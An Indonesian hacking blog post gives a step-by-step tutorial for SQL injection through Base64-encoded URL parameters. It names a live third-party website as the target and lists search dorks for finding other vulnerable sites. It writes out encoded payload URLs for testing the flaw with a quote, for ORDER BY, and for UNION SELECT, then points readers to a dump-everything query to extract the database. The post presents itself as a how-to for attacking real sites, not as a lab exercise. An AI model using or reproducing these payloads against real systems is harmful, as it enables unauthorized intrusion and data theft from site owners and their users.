Assalamualaikum
Lanjut lagi bersama Noub93 Gans :v
Akan kasih tutor Base64 Ez-_
Alat tempur :
-> Apk Codec (download di play store)
-> Dork :
Inurl:/php?id=MQ==
Inurl:/php?Id=NQ==
Inurl:/php?id=NW==
-> Dios
Live Target : http://www.knotsolutions.com/job.php?id=MQ==
Oke seperti biasa kita cek vuln atau ngga nya
Cara cek vuln nya? Kalian buka terlebih dahulu apk codec
Kalian ganti Ascii jadi Base64
Jika sudah kalian tempel id nya tadi MQ==
Di kotak bawah
Nah terus kalian kasi tanda ' di angka 1
Lalu salin aja code yang muncul, yg gua buletin:v
Lalu tempel di http://www.knotsolutions.com/job.php?id=
Contoh : http://www.knotsolutions.com/job.php?id=MSc=
Lalu kalian tempel di google/crome untuk mengecek vuln atau tidak
Nah gambar akan menjadi seperti ini
Lalu kalian order by seperti biasa......
Cuma disini beda tidak memakai (+)
Contoh :
Kalian salin aja code nya lalu tempel lagi di id= contoh
http://www.knotsolutions.com/job.php?id=MSBvcmRlciBieSAxLS0gLQ==
Lalu tempel ke google/crome maka tampilan akan menjadi seperti
Oke lanjut ,kita ganti oder by menjadi union select
Tapi kita kasi - sesudah param .... Contoh
Lalu kalian salin lagi code dibawah nya tempel kan di id= atau param:v
Contoh : http://www.knotsolutions.com/job.php?id=LTEgdW5pb24gc2VsZWN0IDEsMiwzLS0gLQ==
Kalian cek kaya tadi biar nemu angka togel:v,maka tampilan akan menjadi seperti ini
Nah angka togel dah ketemu lngsng aja kalian tempel dios nya di angka togel tersebut
Contoh : gua memilih yang 2
Lalu kalian salin code dibawah tempel kan aja sesudah param atau id= (ngerti kan)
Nah kalian tempel aja di google/crome maka tampilan akan menjadi seperti ini
Oke sekian aja tutor dari gua,cukup sekian Terimakasih
#Nexus Cyber Team
Tidak ada komentar:
Posting Komentar